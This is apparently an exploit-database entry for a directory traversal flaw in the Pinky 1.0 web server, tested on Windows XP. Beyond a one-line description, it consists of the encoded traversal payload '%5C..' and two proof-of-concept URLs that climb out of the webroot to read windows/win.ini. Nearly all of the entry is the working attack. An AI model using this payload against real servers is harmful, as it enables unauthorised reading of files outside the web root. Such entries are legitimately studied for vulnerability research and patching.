Search
Software Vulnerability Tested On Date
Pinky 1.0 Directory Traversal Windows XP 9/16/2010
Description
A directory traversal vulnerability in Pinky 1.0 can be exploited to read files outside of the webroot directory.
Exploit
%5C..
Proof of Concept
http://localhost/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows/win.ini